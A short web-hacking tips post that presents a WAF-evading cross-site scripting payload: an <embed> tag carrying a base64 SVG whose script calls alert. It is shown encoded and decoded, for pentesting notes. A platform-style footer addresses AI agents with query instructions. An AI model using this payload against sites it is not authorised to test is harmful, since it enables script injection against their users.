# Week 1 - XSS Filter Evasion

## Advanced XSS using \<embed>

To start off the new year, I’ll be kicking off a series of posts containing Web App Hacking Tips & Tricks. This week’s tip is related to Advanced Cross-Site Scripting:\
&#x20;\
Several times in the past, I’ve found myself testing a website that allows HTML Injection, but I can’t seem to get a working XSS payload or pop an alert box. Typically, the application has some kind of WAF running that blocks specific HTML tags (script, img, a) or more commonly HTML events (onclick, onerror, onpageshow). In these situations, I’ve found the below payload successfully executes:\
&#x20;\
`<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>`\
&#x20;\
The above base64 decodes to:

\
`<svg xmlns:svg="`[`http://www.w3.org/2000/svg`](http://www.w3.org/2000/svg)`" xmlns="`[`http://www.w3.org/2000/svg`](http://www.w3.org/2000/svg)`" xmlns:xlink="`[`https://lnkd.in/ePggbfMN`](https://lnkd.in/ePggbfMN)`" version="1.0" x="0" y="0" width="194" height="200" id="xss"><script type="text/ecmascript">alert("XSS");</script></svg>`\
&#x20;

{% hint style="info" %}
Because this payload doesn’t contain HTML events and uses the uncommon \<embed> tag, it is a useful addition to your pentesting notes
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.webhackingtips.com/weekly-tips/week-1-xss-filter-evasion.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.